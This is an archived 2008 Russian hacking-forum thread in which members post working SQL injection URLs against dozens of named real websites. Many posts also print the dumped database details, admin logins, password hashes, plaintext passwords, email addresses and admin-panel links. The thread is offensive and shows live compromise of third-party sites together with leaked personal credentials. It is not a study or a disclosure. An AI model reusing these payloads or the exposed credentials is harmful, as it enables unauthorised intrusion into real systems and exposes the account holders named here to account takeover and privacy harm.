ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.01.2008, 14:50
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
nahostfocus.de
Код HTML:
http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),17/*
USER:ftp23972@waldorf.webpack.hosteurope.de
VERSION:5.0.32-Debian_7etch1~bpo.1-log
DATABASE:nahostfocus_de 13
Код HTML:
http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_name),17+from+information_schema.tables/*
Код HTML:
http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(column_name),17+from+information_schema.columns/*
|
|
|
07.01.2008, 16:06
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
.AU
http://www.unicentral.net.au/
http://www.unicentral.net.au/news.php?id=-1+UNION+SELECT+1,2,convert(concat_ws(0x3A,admin_na me,admin_password)+using+latin1),4,5,6+FROM+admin+ LIMIT+0,1/*
Подобрал таблицу и поля, аккаунт в /admin/ не подходит =\
http://www.spcc.nsw.edu.au/
http://www.spcc.nsw.edu.au/news.php?action=show&news_id=-1+UNION+SELECT+VERSION(),2,3,4,5,6/*
Таблицы подобрать неполучилось |
|
|
|
07.01.2008, 17:40
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
2 trumps
Concat - конкатенция строк. Не нужно писать concat(column_name) FROM что-то, пиши просто column_name FROM что-то 
2 all
http://gaffa.dk/
Код HTML:
http://gaffa.dk/nyheder/view.php/news_id=-17392+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.11-Debian_4sarge8-log:gaffa@localhost:gaffa
http://www.gearjunkies.com/
Код HTML:
http://www.gearjunkies.com/news_info.php?news_id=731+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database())/*
4.0.24-log:gj_web_user@localhost:gearjunkies
http://www.moteurnature.com/
Код HTML:
http://www.moteurnature.com/actu/uneactu.php?news_id=-464+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
4.0.25-standard-log:moteurnaactua@10.0.64.29:moteurnaactua
http://youarenotalone.bg/
Код HTML:
http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*
5.0.30-Debian_3-log:notalone@localhost:notalone
Код HTML:
http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,id,username,password,email),3,4,5,6,7,8,9,10,11,12,13+FROM+admin+LIMIT+5,1/*
1:standart:7b204c168a0c76ef3a93c4ee78dc3b7a:::standart
8:notalone:b37876218b4aff603cccd55d41fd7338:::alonenot
...
http://www.krepsinis.net/
Код HTML:
http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
5.0.22-log:sportotiltas1@192.168.69.21:krepsinis
Код HTML:
http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,USER_NAME,PASSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+users+LIMIT+0,1/*
Setonas:66666:Saulius_p@one.lt (логин справа =)
...
http://www.alteragate.net/
Код HTML:
http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4/*
4.1.15-log:forum_admin@localhost:forum_db
Код HTML:
http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,user_password,user_email),0x71),0x71),4+FROM+phpbb_users+WHERE+user_id=5/*
( http://forum.alteragate.net/)
Silver Elf:315eb115d98fcbad39ffc5edebd669c9:silver.elf@al teragate.net::qweasdzxc
Lord Sirax:b0a2507b88288f07c66cc3398f380052:lord.sirax@ alteragate.net::salamander
Angela_angel:6c30734811916b0f0f24a4630b08036f:ange la_angel@abv.bg::1234321
...
Последний раз редактировалось ~EviL~; 07.01.2008 в 18:03..
|
|
|
|
07.01.2008, 19:51
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://r2.com.au/news.php?page=6&id=-37+union+select+1,2,3,4,5/*
-----------------------------------------------------------------------
http://www.recipeforhappiness.com.au/news.php?p=shw&id=-101+union+select+1,2,3,4,5,6,7,8+from+admin/*
Колонки подобрать не получилось
-----------------------------------------------------------------------
http://www.ecoaction.com.au/news.php?id=-40+union+select+1,2,3,concat(username,char(58),pas sword),5,6+from+users/*
admin:m3mph15
-----------------------------------------------------------------------
http://nsw.cchr.org.au/news.php?id=-62+union+select+table_name,2,3,4,5+from+informatio n_schema.tables/*
-----------------------------------------------------------------------
http://www.swiss.org.au/news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
-----------------------------------------------------------------------
http://www.4id.com.au/news.php?action=show&news_id=-1+union+select+1,concat(username,char(58),password ),3+from+users/*
-----------------------------------------------------------------------
http://www.screenact.act.gov.au/news.php?action=index&id=-6+union+select+1/*
-----------------------------------------------------------------------
http://www.applehomeloan.com.au/news.php?id=-73+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://www.puo.pl/news.php?id=-40+union+select+1,2,3,4,5,6/*&backlink=/
-----------------------------------------------------------------------
http://www.proszowki-basen.pl/news.php?id=-186+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12+from+information_schema.tables+limit+1,100/*
-----------------------------------------------------------------------
http://www.zieloni.org.pl/news.php?id=-3670+union+select+1,2,3,table_name,5,6,7,8,9,10,11 +from+information_schema.tables+limit+1,100/*&PHPSESSID=d541b457ccf042d5d0efd1c85a3234de
-----------------------------------------------------------------------
http://www.ukraine-emb.pl/pl/news.php?id=-271+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------
http://www.azs.agh.edu.pl/news.php?id=-258+union+select+1,2,3,4,5,concat(name,char(58),pa ssword),7+from+users/*
Админка: http://www.azs.agh.edu.pl/logon.php
dosin:zadzior
codzio:warkastrong
sekretariat:rena21ta
kip9:nuvedewiu8eevr
Rino:rinoonir
-----------------------------------------------------------------------
http://www.turystyka.org.pl/news.php?id=-60'+union+select+1,2,3,4,5,6,7,8,9/*
-----------------------------------------------------------------------
http://www.am-strategies.com/en/news.php?ID=-149+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (char(58),login,password,email),13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
admin:test:support@e-commatrix.com
http://am-strategies.com/admin пароль не подходит
-----------------------------------------------------------------------
http://www.bfexplode.de/en/news.php?id=-11+union+select+1,2,password,4+from+users/*
Колонки не нашел((
-----------------------------------------------------------------------
http://audit.kharkov.com/en/news.php?id=-126+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables/*
Есть таблица phpbb_users
-----------------------------------------------------------------------
http://www.focifum.com/en/news.php?list=0&ID=-7+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ekobus.cz/en/news.php?id=-1169768767+union+select+1,2,concat(user,char(58),p ass),4+from+admin/*&lan=en
bus:buPJAuU2.yYGM DES(UNIX)
Админка: http://www.ekobus.cz/admin/
-----------------------------------------------------------------------
http://www.qanat.info/news.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22/*&mode=en
-----------------------------------------------------------------------
http://fph.tu.ac.th/en/news.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&cate=1
-----------------------------------------------------------------------
http://www.audica.co.uk/en/news.php?id=-13+union+select+1,2,3,4,5+from+users/*
-----------------------------------------------------------------------
http://www.le-temps-suspendu.com/revesdesagas/en/news.php?id=-37+union+select+1,2,version(),4/*
-----------------------------------------------------------------------
http://www.xeltek.com.cn/en/news.php?id=-30+union+select+1,2,3,4,5,6/*
P.S Сильно не ругайте))
|
|
|
|
07.01.2008, 19:55
|
|
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391
Репутация:
209
|
|
http://www.abruzzoverdeblu.it/?id=-67+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23/*
http://www.fuorissimo.it/php-bin/joke/users.php?ID=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12/*
http://www.casoniatuttabirra.it/artista.php?id=-1+union+select+1,2,3,4,user(),6,7/*
|
|
|
|
07.01.2008, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.tigella.it/news.php?ID=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
-----------------------------------------------------------------------
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8+from+mysql.user/*
Пароль не отображается((
|
|
|
|
08.01.2008, 00:29
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.naushko.ru/whisper.php?id=-3887+union+select+1,2,3,concat_ws(0x2F,userid,name,pass,email),5,6+from+users+limit+2,2/*
Version 5.026
name/pass/mail
Руслан/asdsdf/ruslan@yusufov.com
Perfecto/prf/ruperfecto@yandex.ru |
|
|
|
08.01.2008, 01:31
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://www.afa.org.tw/
Код HTML:
http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9/*
4.1.20:afa@localhost:afa
Код HTML:
http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,admin_password,6,7,8,9+FROM+admin/*
a65660c1c91cd0a717c1d3ebc7f66c68 (если кому-то надо, админка тут: http://www.afa.org.tw/admin/, а мыло: info@afa.org.tw)
Код HTML:
http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,username,user_password,user_email),6,7,8,9+FROM+phpbb_users+LIMIT+1,1/*
JChen:b51699d453f963ae42af5b37563e3ab2:spetsnaz@ms 29.hinet.net
...
P.S. Кажись сайт китайский, а я удивлялся почему у них форум какой-то левый 
|
|
|
|
08.01.2008, 01:34
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.studiolegalebartolini.it/news.php?id=-66+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ipmaroma2008.it/news.php?ID=-00017+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,table_name+from+information_sc hema.tables/*&r=25
Все таблицы
http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,column_name+from+information_s chema.columns/*&r=25
Все колонки
А дальше сами))
-----------------------------------------------------------------------
http://www.bppa.at/de/news.php?id=-18+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://metfan.de/news.php?id=-258+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|
|
08.01.2008, 01:58
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
2 Tigger
Доводи инъекции до конца или хотя бы выводи version(), user(), database().
Не оставляй просто так, только подобрав поля. Смысла нет =\
2 all =)
Код HTML:
http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&type_id=1
4.0.24:user12325072_1@superultra19.
Код HTML:
http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,name,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+users/*&type_id=1
Not important:tractor
http://www.zik.com.ua/
Код HTML:
http://www.zik.com.ua/index.php?news_id=45555+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.22-log:zik@localhost:zik
http://www.nisc.lt/
Код HTML:
http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
5.0.27-log:nisc@mysql50:nisc
Код HTML:
http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,convert(table_name+using+latin1),4,5+FROM+information_schema.tables/*
1: admin:fa2a336347b0da6f022232868d831c73: aivaras@knotdesign.com
9: martinas:16f48b6a5ffdf2665c25dba0a58df350: martinas@nisc.lt
10: olia:ade9fb3441b9794e97329a4adf2b4939: olia@nisc.lt
Последний раз редактировалось ~EviL~; 08.01.2008 в 03:44..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?552492){kind=avatar}
Комбинированный вид